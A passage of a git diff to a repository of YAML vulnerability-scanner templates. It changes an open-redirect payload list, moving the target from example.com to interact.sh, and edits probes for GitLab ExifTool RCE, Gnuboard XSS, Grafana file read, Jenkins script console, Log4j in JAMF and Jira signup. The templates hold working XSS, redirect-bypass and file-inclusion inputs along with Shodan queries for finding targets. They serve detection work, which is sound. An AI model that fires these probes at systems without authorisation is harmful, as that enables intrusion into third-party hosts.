-        - '///{{RootURL}}example.com/%2f%2e%2e'
-        - '//;@example.com'
-        - '//\/example.com/'
-        - '//\@example.com'
-        - '//\example.com'
-        - '//\texample.com/'
-        - '//example.com/%2F..'
-        - '//example.com//'
-        - '//example.com@//'
-        - '//example.com\texample.com/'
-        - '//https://example.com@//'
-        - '/<>//example.com'
-        - '/\/\/example.com/'
-        - '/\/example.com'
-        - '/\example.com'
-        - '/example.com'
-        - '/example.com/%2F..'
-        - '/example.com/'
-        - '/example.com/..;/css'
-        - '/https:example.com'
-        - '/{{RootURL}}example.com/'
-        - '/〱example.com'
-        - '/〵example.com'
-        - '/ゝexample.com'
-        - '/ーexample.com'
-        - '/ｰexample.com'
-        - '<>//example.com'
-        - '@example.com'
-        - '@https://example.com'
-        - '\/\/example.com/'
-        - 'example%E3%80%82com'
-        - 'example.com'
-        - 'example.com/'
-        - 'example.com//'
-        - 'example.com;@'
-        - 'https%3a%2f%2fexample.com%2f'
-        - 'https:%0a%0dexample.com'
-        - 'https://%0a%0dexample.com'
-        - 'https://%09/example.com'
-        - 'https://%2f%2f.example.com/'
-        - 'https://%3F.example.com/'
-        - 'https://%5c%5c.example.com/'
-        - 'https://%5cexample.com@'
-        - 'https://%23.example.com/'
-        - 'https://.example.com'
-        - 'https://////example.com'
-        - 'https:///example.com'
-        - 'https:///example.com/%2e%2e'
-        - 'https:///example.com/%2f%2e%2e'
-        - 'https:///example.com@example.com/%2e%2e'
-        - 'https:///example.com@example.com/%2f%2e%2e'
-        - 'https://:80#@example.com/'
-        - 'https://:80?@example.com/'
-        - 'https://:@\@example.com'
-        - 'https://:@example.com\@example.com'
-        - 'https://:@example.com\@WillBeReplaced.com'
-        - 'https://;@example.com'
-        - 'https://\texample.com/'
-        - 'https://example.com/example.com'
-        - 'https://example.com/https://example.com/'
-        - 'https://www.\.example.com'
-        - 'https:/\/\example.com'
-        - 'https:/\example.com'
-        - 'https:/example.com'
-        - 'https:example.com'
-        - '{{RootURL}}example.com'
-        - '〱example.com'
-        - '〵example.com'
-        - 'ゝexample.com'
-        - 'ーexample.com'
-        - 'ｰexample.com'
-        - '?page=example.com&_url=example.com&callback=example.com&checkout_url=example.com&content=example.com&continue=example.com&continueTo=example.com&counturl=example.com&data=example.com&dest=example.com&dest_url=example.com&dir=example.com&document=example.com&domain=example.com&done=example.com&download=example.com&feed=example.com&file=example.com&host=example.com&html=example.com&http=example.com&https=example.com&image=example.com&image_src=example.com&image_url=example.com&imageurl=example.com&include=example.com&langTo=example.com&media=example.com&navigation=example.com&next=example.com&open=example.com&out=example.com&page=example.com&page_url=example.com&pageurl=example.com&path=example.com&picture=example.com&port=example.com&proxy=example.com&redir=example.com&redirect=example.com&redirectUri=example.com&redirectUrl=example.com&reference=example.com&referrer=example.com&req=example.com&request=example.com&retUrl=example.com&return=example.com&returnTo=example.com&return_path=example.com&return_to=example.com&rurl=example.com&show=example.com&site=example.com&source=example.com&src=example.com&target=example.com&to=example.com&uri=example.com&url=example.com&val=example.com&validate=example.com&view=example.com&window=example.com&redirect_to=example.com&ret=example.com&r2=example.com&img=example.com&u=example.com&r=example.com&URL=example.com&AuthState=example.com'
+        - '%0a/interact.sh/'
+        - '%0d/interact.sh/'
+        - '%00/interact.sh/'
+        - '%09/interact.sh/'
+        - '%5C%5Cinteract.sh/%252e%252e%252f'
+        - '%5Cinteract.sh'
+        - '%5cinteract.sh/%2f%2e%2e'
+        - '%5c{{RootURL}}interact.sh/%2f%2e%2e'
+        - '../interact.sh'
+        - '.interact.sh'
+        - '/%5cinteract.sh'
+        - '////\;@interact.sh'
+        - '////interact.sh'
+        - '///interact.sh'
+        - '///interact.sh/%2f%2e%2e'
+        - '///interact.sh@//'
+        - '///{{RootURL}}interact.sh/%2f%2e%2e'
+        - '//;@interact.sh'
+        - '//\/interact.sh/'
+        - '//\@interact.sh'
+        - '//\interact.sh'
+        - '//\tinteract.sh/'
+        - '//interact.sh/%2F..'
+        - '//interact.sh//'
+        - '//%69%6e%74%65%72%61%63%74%2e%73%68'
+        - '//interact.sh@//'
+        - '//interact.sh\tinteract.sh/'
+        - '//https://interact.sh@//'
+        - '/<>//interact.sh'
+        - '/\/\/interact.sh/'
+        - '/\/interact.sh'
+        - '/\interact.sh'
+        - '/interact.sh'
+        - '/interact.sh/%2F..'
+        - '/interact.sh/'
+        - '/interact.sh/..;/css'
+        - '/https:interact.sh'
+        - '/{{RootURL}}interact.sh/'
+        - '/〱interact.sh'
+        - '/〵interact.sh'
+        - '/ゝinteract.sh'
+        - '/ーinteract.sh'
+        - '/ｰinteract.sh'
+        - '<>//interact.sh'
+        - '@interact.sh'
+        - '@https://interact.sh'
+        - '\/\/interact.sh/'
+        - 'interact%E3%80%82sh'
+        - 'interact.sh'
+        - 'interact.sh/'
+        - 'interact.sh//'
+        - 'interact.sh;@'
+        - 'https%3a%2f%2finteract.sh%2f'
+        - 'https:%0a%0dinteract.sh'
+        - 'https://%0a%0dinteract.sh'
+        - 'https://%09/interact.sh'
+        - 'https://%2f%2f.interact.sh/'
+        - 'https://%3F.interact.sh/'
+        - 'https://%5c%5c.interact.sh/'
+        - 'https://%5cinteract.sh@'
+        - 'https://%23.interact.sh/'
+        - 'https://.interact.sh'
+        - 'https://////interact.sh'
+        - 'https:///interact.sh'
+        - 'https:///interact.sh/%2e%2e'
+        - 'https:///interact.sh/%2f%2e%2e'
+        - 'https:///interact.sh@interact.sh/%2e%2e'
+        - 'https:///interact.sh@interact.sh/%2f%2e%2e'
+        - 'https://:80#@interact.sh/'
+        - 'https://:80?@interact.sh/'
+        - 'https://:@\@interact.sh'
+        - 'https://:@interact.sh\@interact.sh'
+        - 'https://:@interact.sh\@WillBeReplaced.com'
+        - 'https://;@interact.sh'
+        - 'https://\tinteract.sh/'
+        - 'https://interact.sh/interact.sh'
+        - 'https://interact.sh/https://interact.sh/'
+        - 'https://www.\.interact.sh'
+        - 'https:/\/\interact.sh'
+        - 'https:/\interact.sh'
+        - 'https:/interact.sh'
+        - 'https:interact.sh'
+        - '{{RootURL}}interact.sh'
+        - '〱interact.sh'
+        - '〵interact.sh'
+        - 'ゝinteract.sh'
+        - 'ーinteract.sh'
+        - 'ｰinteract.sh'
+        - '?page=interact.sh&_url=interact.sh&callback=interact.sh&checkout_url=interact.sh&content=interact.sh&continue=interact.sh&continueTo=interact.sh&counturl=interact.sh&data=interact.sh&dest=interact.sh&dest_url=interact.sh&dir=interact.sh&document=interact.sh&domain=interact.sh&done=interact.sh&download=interact.sh&feed=interact.sh&file=interact.sh&host=interact.sh&html=interact.sh&http=interact.sh&https=interact.sh&image=interact.sh&image_src=interact.sh&image_url=interact.sh&imageurl=interact.sh&include=interact.sh&langTo=interact.sh&media=interact.sh&navigation=interact.sh&next=interact.sh&open=interact.sh&out=interact.sh&page=interact.sh&page_url=interact.sh&pageurl=interact.sh&path=interact.sh&picture=interact.sh&port=interact.sh&proxy=interact.sh&redir=interact.sh&redirect=interact.sh&redirectUri=interact.sh&redirectUrl=interact.sh&reference=interact.sh&referrer=interact.sh&req=interact.sh&request=interact.sh&retUrl=interact.sh&return=interact.sh&returnTo=interact.sh&return_path=interact.sh&return_to=interact.sh&rurl=interact.sh&show=interact.sh&site=interact.sh&source=interact.sh&src=interact.sh&target=interact.sh&to=interact.sh&uri=interact.sh&url=interact.sh&val=interact.sh&validate=interact.sh&view=interact.sh&window=interact.sh&redirect_to=interact.sh&ret=interact.sh&r2=interact.sh&img=interact.sh&u=interact.sh&r=interact.sh&URL=interact.sh&AuthState=interact.sh'
 
     stop-at-first-match: true
     matchers-condition: and
@@ -111,7 +112,7 @@ requests:
       - type: regex
         part: header
         regex:
-          - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)example\.com\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1
+          - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1
 
       - type: status
         status:
@@ -119,4 +120,4 @@ requests:
           - 302
           - 307
           - 308
-        condition: or
\ No newline at end of file
+        condition: or
diff --git a/vulnerabilities/generic/xmlrpc-pingback-ssrf.yaml b/vulnerabilities/generic/xmlrpc-pingback-ssrf.yaml
index 7d42755be4..e0c92c8f0c 100644
--- a/vulnerabilities/generic/xmlrpc-pingback-ssrf.yaml
+++ b/vulnerabilities/generic/xmlrpc-pingback-ssrf.yaml
@@ -6,7 +6,7 @@ info:
   severity: high
   reference:
     - https://hackerone.com/reports/406387
-  tags: ssrf,generic,xmlrpc
+  tags: xmlrpc,hackerone,ssrf,generic
 
 requests:
   - raw:
diff --git a/vulnerabilities/gitlab/gitlab-rce.yaml b/vulnerabilities/gitlab/gitlab-rce.yaml
index dade1377d0..115c90af63 100644
--- a/vulnerabilities/gitlab/gitlab-rce.yaml
+++ b/vulnerabilities/gitlab/gitlab-rce.yaml
@@ -4,21 +4,20 @@ info:
   name: GitLab CE/EE Unauthenticated RCE Using ExifTool
   author: pdteam
   severity: critical
-  description: GitLab CE/EE contains a vulnreability which allows a specially crafted image passed to a file parser to perform a command execution attack. Versions impacted are between 11.9-13.8.7, 13.9-13.9.5, and
-    13.10-13.10.2.
+  description: GitLab CE/EE contains a vulnreability which allows a specially crafted image passed to a file parser to perform a command execution attack. Versions impacted are between 11.9-13.8.7, 13.9-13.9.5, and 13.10-13.10.2.
   reference:
     - https://security.humanativaspa.it/gitlab-ce-cve-2021-22205-in-the-wild/
     - https://hackerone.com/reports/1154542
     - https://nvd.nist.gov/vuln/detail/CVE-2021-22205
+  remediation: Upgrade to versions 13.10.3, 13.9.6, 13.8.8, or higher.
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
-    cvss-score: 10.0
+    cvss-score: 10
     cve-id: CVE-2021-22205
     cwe-id: CWE-20
-  remediation: Upgrade to versions 13.10.3, 13.9.6, 13.8.8, or higher.
   metadata:
     shodan-query: http.title:"GitLab"
-  tags: cve,cve2021,gitlab,rce,oast,intrusive
+  tags: oast,intrusive,hackerone,cve,cve2021,gitlab,rce,kev
 
 requests:
   - raw:
diff --git a/vulnerabilities/other/gnuboard-sms-xss.yaml b/vulnerabilities/gnuboard/gnuboard-sms-xss.yaml
similarity index 93%
rename from vulnerabilities/other/gnuboard-sms-xss.yaml
rename to vulnerabilities/gnuboard/gnuboard-sms-xss.yaml
index 155dea7f7d..ac13726778 100644
--- a/vulnerabilities/other/gnuboard-sms-xss.yaml
+++ b/vulnerabilities/gnuboard/gnuboard-sms-xss.yaml
@@ -1,7 +1,7 @@
 id: gnuboard-sms-xss
 
 info:
-  name: Gnuboard CMS - SMS Emoticon XSS
+  name: Gnuboard CMS - SMS Emoticon Cross-Site Scripting
   author: gy741
   severity: medium
   description: A vulnerability in Gnuboard CMS allows remote attackers to inject arbitrary Javascript into the responses returned by the server.
diff --git a/vulnerabilities/gnuboard/gnuboard5-rxss.yaml b/vulnerabilities/gnuboard/gnuboard5-rxss.yaml
new file mode 100644
index 0000000000..383d3f0720
--- /dev/null
+++ b/vulnerabilities/gnuboard/gnuboard5-rxss.yaml
@@ -0,0 +1,34 @@
+id: gnuboard5-rxss
+
+info:
+  name: Gnuboard5 - Cross-Site Scripting
+  author: arafatansari
+  severity: medium
+  description: |
+    Gnuboard 5 is vulnerable to reflected XSS via $_GET['LGD_OID'].
+  reference:
+    - https://huntr.dev/bounties/ed317cde-9bd1-429e-b6d3-547e72534dd5/
+  metadata:
+    verified: true
+    shodan-query: http.html:"gnuboard5"
+  tags: gnuboard,xss,huntr
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/mobile/shop/lg/mispwapurl.php?LGD_OID=%3Cscript%3Ealert(document.domain)%3C/script%3E"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - 'LGD_OID = <script>alert(document.domain)</script>'
+
+      - type: word
+        part: header
+        words:
+          - text/html
+
+      - type: status
+        status:
+          - 200
diff --git a/vulnerabilities/gnuboard/gnuboard5-xss.yaml b/vulnerabilities/gnuboard/gnuboard5-xss.yaml
new file mode 100644
index 0000000000..7d6a45de35
--- /dev/null
+++ b/vulnerabilities/gnuboard/gnuboard5-xss.yaml
@@ -0,0 +1,34 @@
+id: gnuboard5-xss
+
+info:
+  name: Gnuboard5 - Cross-Site Scripting
+  author: arafatansari
+  severity: medium
+  description: |
+    Gnuboard 5 is vulnerable to reflected XSS to a flaw in the clean_xss_tags() function called in new.php.
+  reference:
+    - https://huntr.dev/bounties/ad2a9b32-fe6c-43e9-9b05-2c77c58dde6a/
+  metadata:
+    verified: true
+    shodan-query: http.html:"gnuboard5"
+  tags: xss,gnuboard,gnuboard5,huntr
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/bbs/new.php?darkmode=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - 'header\"><script>alert(document.domain)</script>.css?'
+
+      - type: word
+        part: header
+        words:
+          - text/html
+
+      - type: status
+        status:
+          - 200
diff --git a/vulnerabilities/grafana/grafana-file-read.yaml b/vulnerabilities/grafana/grafana-file-read.yaml
index 0a66fcb668..baea119cc1 100644
--- a/vulnerabilities/grafana/grafana-file-read.yaml
+++ b/vulnerabilities/grafana/grafana-file-read.yaml
@@ -1,14 +1,23 @@
 id: grafana-file-read
 
 info:
-  name: Grafana v8.x Arbitrary File Read
+  name: Grafana 8.x - Local File Inclusion
   author: z0ne,dhiyaneshDk,jeya.seelan,dwisiswant0
   severity: high
+  description: Grafana 8.x is vulnerable to local file inclusion.
   reference:
+    - https://grafana.com/blog/2021/12/08/an-update-on-0day-cve-2021-43798-grafana-directory-traversal/
     - https://nosec.org/home/detail/4914.html
     - https://github.com/jas502n/Grafana-VulnTips
-    - hhttps://github.com/grafana/grafana/security/advisories/GHSA-8pjx-jj86-j47p
+    - https://github.com/grafana/grafana/security/advisories/GHSA-8pjx-jj86-j47p
     - https://twitter.com/naglinagli/status/1468155313182416899
+    - https://nvd.nist.gov/vuln/detail/CVE-2021-43798
+  metadata:
+    shodan-query: title:"Grafana"
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+    cvss-score: 7.5
+    cwe-id: CWE-22
   tags: grafana,lfi,fuzz
 
 requests:
@@ -30,4 +39,6 @@ requests:
 
       - type: status
         status:
-          - 200
\ No newline at end of file
+          - 200
+
+# Enhanced by mp on 2022/07/22
diff --git a/vulnerabilities/httpbin/httpbin-open-redirect.yaml b/vulnerabilities/httpbin/httpbin-open-redirect.yaml
index 08aff96109..961d4ae06f 100644
--- a/vulnerabilities/httpbin/httpbin-open-redirect.yaml
+++ b/vulnerabilities/httpbin/httpbin-open-redirect.yaml
@@ -15,13 +15,13 @@ info:
 requests:
   - method: GET
     path:
-      - "{{BaseURL}}/redirect-to?url=https%3A%2F%2Fexample.com"
+      - "{{BaseURL}}/redirect-to?url=https%3A%2F%2Finteract.sh"
 
     matchers-condition: and
     matchers:
       - type: dsl
         dsl:
-          - 'location == "https://example.com"'
+          - 'location == "https://interact.sh"'
 
       - type: status
         status:
diff --git a/vulnerabilities/httpbin/httpbin-xss.yaml b/vulnerabilities/httpbin/httpbin-xss.yaml
index e384b8cb83..7282471d26 100644
--- a/vulnerabilities/httpbin/httpbin-xss.yaml
+++ b/vulnerabilities/httpbin/httpbin-xss.yaml
@@ -1,7 +1,7 @@
 id: httpbin-xss
 
 info:
-  name: HTTPBin - Cross Site Scripting
+  name: HTTPBin - Cross-Site Scripting
   author: Adam Crosser
   severity: medium
   reference:
diff --git a/vulnerabilities/huawei/huawei-hg255s-lfi.yaml b/vulnerabilities/huawei/huawei-hg255s-lfi.yaml
index 71a0d509f3..d9454324b6 100644
--- a/vulnerabilities/huawei/huawei-hg255s-lfi.yaml
+++ b/vulnerabilities/huawei/huawei-hg255s-lfi.yaml
@@ -1,12 +1,17 @@
 id: huawei-hg255s-lfi
 
 info:
-  name: Huawei HG255s - Directory Traversal
+  name: Huawei HG255s - Local File Inclusion
   author: 0x_Akoko
   severity: high
+  description: Huawei HG255s is vulnerable to local file inclusion due to insufficient validation of the received HTTP requests. A remote attacker may access the local files on the device without authentication.
   reference:
     - https://cxsecurity.com/issue/WLB-2017090053
     - https://www.youtube.com/watch?v=n02toTFkLOU
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+    cvss-score: 7.5
+    cwe-id: CWE-22
   metadata:
     shodan-query: http.html:"HG532e"
   tags: huawei,lfi,router
@@ -25,3 +30,5 @@ requests:
       - type: status
         status:
           - 200
+
+# Enhanced by mp on 2022/07/22
diff --git a/vulnerabilities/ibm/eclipse-help-system-xss.yaml b/vulnerabilities/ibm/eclipse-help-system-xss.yaml
index 86194399fa..4581fcf647 100644
--- a/vulnerabilities/ibm/eclipse-help-system-xss.yaml
+++ b/vulnerabilities/ibm/eclipse-help-system-xss.yaml
@@ -1,7 +1,7 @@
 id: eclipse-help-system-xss
 
 info:
-  name: Eclipse Help System RXSS vulnerability
+  name: Eclipse Help System Cross-Site Scripting
   author: pikpikcu
   severity: medium
   tags: ibm,xss
@@ -22,4 +22,4 @@ requests:
       - type: word
         words:
           - "text/html"
-        part: header
\ No newline at end of file
+        part: header
diff --git a/vulnerabilities/ibm/ibm-infoprint-lfi.yaml b/vulnerabilities/ibm/ibm-infoprint-lfi.yaml
index 899fad8ae8..eea7046472 100644
--- a/vulnerabilities/ibm/ibm-infoprint-lfi.yaml
+++ b/vulnerabilities/ibm/ibm-infoprint-lfi.yaml
@@ -1,13 +1,17 @@
 id: ibm-infoprint-lfi
 
 info:
-  name: IBM InfoPrint 4247-Z03 Impact Matrix Printer - Directory Traversal
+  name: IBM InfoPrint 4247-Z03 Impact Matrix Printer - Local File Inclusion
   author: harshbothra_
-  severity: medium
-  description: Directory traversal vulnerability on IBM InfoPrint 4247-Z03 Impact Matrix Printer.
+  severity: high
+  description: IBM InfoPrint 4247-Z03 Impact Matrix Printer is subject to local file inclusion.
   reference:
     - https://www.exploit-db.com/exploits/47835
-  tags: ibm,lfi,matrix,printer
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+    cvss-score: 7.5
+    cwe-id: CWE-22
+  tags: matrix,printer,edb,ibm,lfi
 
 requests:
   - method: GET
@@ -22,3 +26,5 @@ requests:
         regex:
           - "root:.*:0:0:"
         part: body
+
+# Enhanced by mp on 2022/07/22
diff --git a/vulnerabilities/ibm/ibm-websphere-ssrf.yaml b/vulnerabilities/ibm/ibm-websphere-ssrf.yaml
deleted file mode 100644
index 777b9a5e06..0000000000
--- a/vulnerabilities/ibm/ibm-websphere-ssrf.yaml
+++ /dev/null
@@ -1,29 +0,0 @@
-id: ibm-websphere-ssrf
-
-info:
-  name: IBM WebSphere Portal SSRF
-  author: pdteam
-  severity: high
-  reference:
-    - https://blog.assetnote.io/2021/12/26/chained-ssrf-websphere/
-  tags: ibm,ssrf,websphere
-
-requests:
-  - method: GET
-    path:
-      - '{{BaseURL}}/docpicker/internal_proxy/http/example.com'
-      - '{{BaseURL}}/wps/PA_WCM_Authoring_UI/proxy/http/example.com'
-
-    redirects: true
-    max-redirects: 2
-    stop-at-first-match: true
-    matchers-condition: and
-    matchers:
-
-      - type: status
-        status:
-          - 200
-
-      - type: word
-        words:
-          - "<title>Example Domain</title>"
\ No newline at end of file
diff --git a/vulnerabilities/j2ee/liferay-resource-leak.yaml b/vulnerabilities/j2ee/liferay-resource-leak.yaml
new file mode 100644
index 0000000000..54b172ba94
--- /dev/null
+++ b/vulnerabilities/j2ee/liferay-resource-leak.yaml
@@ -0,0 +1,38 @@
+id: liferay-resource-leak
+
+info:
+  name: Liferay - Resource leakage through I18nServlet
+  author: DhiyaneshDk
+  severity: high
+  description: |
+    I18n Servlet leaks information by sending an HTTP request to /[language]/[resource];.js (also .jsp works).
+  remediation: Update Liferay to the latest version
+  reference:
+    - https://github.com/ilmila/J2EEScan/blob/master/src/main/java/burp/j2ee/issues/impl/LiferayI18nServletResourceLeaks.java
+  metadata:
+    verified: true
+    shodan-query: title:"Liferay"
+  tags: liferay,lfi,j2ee
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/en/WEB-INF/web.xml;.js"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "<web-app id="
+          - "<?xml"
+        condition: and
+
+      - type: word
+        part: header
+        words:
+          - "application/xml"
+
+      - type: status
+        status:
+          - 200
diff --git a/vulnerabilities/jamf/jamf-log4j-jndi-rce.yaml b/vulnerabilities/jamf/jamf-log4j-jndi-rce.yaml
index b3dc039870..8b1abd2474 100644
--- a/vulnerabilities/jamf/jamf-log4j-jndi-rce.yaml
+++ b/vulnerabilities/jamf/jamf-log4j-jndi-rce.yaml
@@ -1,12 +1,24 @@
 id: jamf-log4j-jndi-rce
 
 info:
-  name: JAMF Log4j JNDI RCE
+  name: JamF  - Log4j Remote Code Execution
   author: pdteam
   severity: critical
+  description: |
+    JamF is susceptible to Lof4j JNDI remote code execution. JamF is the industry standard when it comes to the management of iOS devices (iPhones and iPads), macOS computers (MacBooks, iMacs, etc.), and tvOS devices (Apple TV).
   reference:
     - https://github.com/random-robbie/jamf-log4j
-  tags: rce,jndi,log4j,jamf
+    - https://community.connection.com/what-is-jamf/
+    - https://logging.apache.org/log4j/2.x/security.html
+    - https://nvd.nist.gov/vuln/detail/CVE-2021-44228
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
+    cvss-score: 10.0
+    cwe-id: CWE-77
+  metadata:
+    verified: true
+    shodan-query: http.html:"JamF"
+  tags: cve,cve2021,rce,jndi,log4j,jamf,oast
 
 requests:
   - raw:
@@ -37,3 +49,5 @@ requests:
         group: 1
         regex:
           - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+'   # Print extracted ${hostName} in output
+
+# Enhanced by mp on 2022/05/27
diff --git a/vulnerabilities/jenkins/jenkins-script.yaml b/vulnerabilities/jenkins/jenkins-script.yaml
index aa73329709..bac70353e9 100644
--- a/vulnerabilities/jenkins/jenkins-script.yaml
+++ b/vulnerabilities/jenkins/jenkins-script.yaml
@@ -1,25 +1,40 @@
 id: jenkins-script
 
 info:
-  name: Jenkins RCE due to accessible script functionality
+  name: Jenkins - Remote Code Execution
   author: philippedelteil
   severity: critical
+  description: |
+    Jenkins is susceptible to a remote code execution vulnerability due to accessible script functionality.
   reference:
     - https://hackerone.com/reports/403402
-  tags: jenkins,rce,devops
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
+    cvss-score: 10.0
+    cwe-id: CWE-77
+  tags: devops,hackerone,jenkins,rce
 
 requests:
   - method: GET
     path:
       - "{{BaseURL}}/script/"
+
     matchers-condition: and
     matchers:
       - type: word
+        part: body
         words:
           - "println(Jenkins.instance.pluginManager.plugins)"
-          - "Scriptconsole"
-        condition: and
+
+      - type: word
         part: body
+        words:
+          - "Script Console"
+          - "Scriptconsole"
+        condition: or
+
       - type: status
         status:
           - 200
+
+# Enhanced by mp on 2022/05/26
diff --git a/vulnerabilities/jenkins/jenkins-stack-trace.yaml b/vulnerabilities/jenkins/jenkins-stack-trace.yaml
index 88cea915bc..edcf653e98 100644
--- a/vulnerabilities/jenkins/jenkins-stack-trace.yaml
+++ b/vulnerabilities/jenkins/jenkins-stack-trace.yaml
@@ -7,7 +7,7 @@ info:
   description: Module identified that the affected host is running an instance of Jenkins in debug mode, as a result stack traces are enabled.
   reference:
     - https://hackerone.com/reports/221833
-  tags: jenkins
+  tags: jenkins,hackerone
 
 requests:
   - method: GET
diff --git a/vulnerabilities/jira/jira-service-desk-signup.yaml b/vulnerabilities/jira/jira-service-desk-signup.yaml
deleted file mode 100644
index 1cfce39b45..0000000000
--- a/vulnerabilities/jira/jira-service-desk-signup.yaml
+++ /dev/null
@@ -1,23 +0,0 @@
-id: jira-service-desk-signup
-
-info:
-  name: Jira Service Desk Signup
-  author: TechbrunchFR
-  severity: medium
-  tags: jira,atlassian,service
-
-requests:
-  - method: POST
-    path:
-      - "{{BaseURL}}/servicedesk/customer/user/signup"
-    headers:
-      Content-Type: application/json
-    body: '{"email":"invalid","signUpContext":{},"secondaryEmail":"","usingNewUi":true}'
-    matchers-condition: and
-    matchers:
-      - type: word
-        words:
-          - "signup.validation.errors"
-      - type: status
-        status:
-          - 400
diff --git a/vulnerabilities/jira/jira-servicedesk-signup.yaml b/vulnerabilities/jira/jira-servicedesk-signup.yaml
new file mode 100644
index 0000000000..3e3c647771
--- /dev/null
+++ b/vulnerabilities/jira/jira-servicedesk-signup.yaml
@@ -0,0 +1,54 @@
+id: jira-servicedesk-signup
+
+info:
+  name: Atlassian Jira Service Desk Signup
+  author: TechbrunchFR
+  severity: medium
+  description:
+    This instance of Atlassian JIRA is misconfigured to allow an attacker to sign up (create a new account) just by navigating to the signup page that is accessible at the URL /servicedesk/customer/user/signup. After the attacker has created a new account it's possible for him/her to access the support portal.
+  reference:
+    - https://www.acunetix.com/vulnerabilities/web/atlassian-jira-servicedesk-misconfiguration/
+  metadata:
+    shodan-query: http.component:"Atlassian Jira"
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+    cvss-score: 6.1
+    cwe-id: CWE-287
+  tags: atlassian,servicedesk,jira,confluence
+
+requests:
+  - raw:
+      - |
+        GET /servicedesk/customer/user/signup HTTP/1.1
+        Host: {{Hostname}}
+
+      - |
+        POST /servicedesk/customer/user/signup HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/json
+        Origin: {{RootURL}}
+        Referer: {{RootURL}}/servicedesk/customer/user/signup
+
+        {"email":"","fullname":"{{randstr}}","password":"","captcha":"","secondaryEmail":""}
+
+      - |
+        GET /secure/Signup!default.jspa HTTP/1.1
+        Host: {{Hostname}}
+
+      - |
+        POST /secure/Signup.jspa HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+        Origin: {{RootURL}}
+        Referer: {{RootURL}}/secure/Signup.jspa
+
+        email=&fullname={{randstr}}&username=&password=&Signup=Sign+up
+
+    cookie-reuse: true
+    stop-at-first-match: true
+    matchers:
+      - type: word
+        words:
+          - 'signup.validation.errors'
+          - 'signup-username-error'
+        condition: or
\ No newline at end of file
diff --git a/vulnerabilities/jira/jira-unauthenticated-adminprojects.yaml b/vulnerabilities/jira/jira-unauthenticated-adminprojects.yaml
index 511ea18cc7..a9113c2e94 100644
--- a/vulnerabilities/jira/jira-unauthenticated-adminprojects.yaml
+++ b/vulnerabilities/jira/jira-unauthenticated-adminprojects.yaml
@@ -4,6 +4,8 @@ info:
   name: Jira Unauthenticated Admin Projects
   author: TESS
   severity: info
+  metadata:
+    shodan-query: http.component:"Atlassian Jira"
   tags: atlassian,jira
 
 requests:
diff --git a/vulnerabilities/jira/jira-unauthenticated-dashboards.yaml b/vulnerabilities/jira/jira-unauthenticated-dashboards.yaml
index c07f287060..8f55d387e0 100644
--- a/vulnerabilities/jira/jira-unauthenticated-dashboards.yaml
+++ b/vulnerabilities/jira/jira-unauthenticated-dashboards.yaml
@@ -7,6 +7,8 @@ info:
   name: Jira Unauthenticated Dashboards
   author: TechbrunchFR
   severity: info
+  metadata:
+    shodan-query: http.component:"Atlassian Jira"
   tags: atlassian,jira
 
 requests:
diff --git a/vulnerabilities/jira/jira-unauthenticated-installed-gadgets.yaml b/vulnerabilities/jira/jira-unauthenticated-installed-gadgets.yaml
index da56b71092..4a028019f9 100644
--- a/vulnerabilities/jira/jira-unauthenticated-installed-gadgets.yaml
+++ b/vulnerabilities/jira/jira-unauthenticated-installed-gadgets.yaml
@@ -5,6 +5,8 @@ info:
   author: philippedelteil
   severity: info
   description: Some Jira instances allow to read the installed gadgets (sometimes it's also possible to read config xml file for some gadgets)
+  metadata:
+    shodan-query: http.component:"Atlassian Jira"
   tags: atlassian,jira
 
 requests:
diff --git a/vulnerabilities/jira/jira-unauthenticated-projectcategories.yaml b/vulnerabilities/jira/jira-unauthenticated-projectcategories.yaml
index ff6dcd5d49..9309a5a163 100644
--- a/vulnerabilities/jira/jira-unauthenticated-projectcategories.yaml
+++ b/vulnerabilities/jira/jira-unauthenticated-projectcategories.yaml
@@ -4,6 +4,8 @@ info:
   name: Jira Unauthenticated Project Categories
   author: TESS
   severity: info
+  metadata:
+    shodan-query: http.component:"Atlassian Jira"
   tags: atlassian,jira
 
 requests:
diff --git a/vulnerabilities/jira/jira-unauthenticated-projects.yaml b/vulnerabilities/jira/jira-unauthenticated-projects.yaml
index 699ab554d3..3fa6ca2b88 100644
--- a/vulnerabilities/jira/jira-unauthenticated-projects.yaml
+++ b/vulnerabilities/jira/jira-unauthenticated-projects.yaml
@@ -4,6 +4,8 @@ info:
   name: Jira Unauthenticated Projects
   author: TechbrunchFR
   severity: info
+  metadata:
+    shodan-query: http.component:"Atlassian Jira"
   tags: atlassian,jira
 
 requests:
diff --git a/vulnerabilities/jira/jira-unauthenticated-resolutions.yaml b/vulnerabilities/jira/jira-unauthenticated-resolutions.yaml
index 0fc7625703..8967bcc57a 100644
--- a/vulnerabilities/jira/jira-unauthenticated-resolutions.yaml
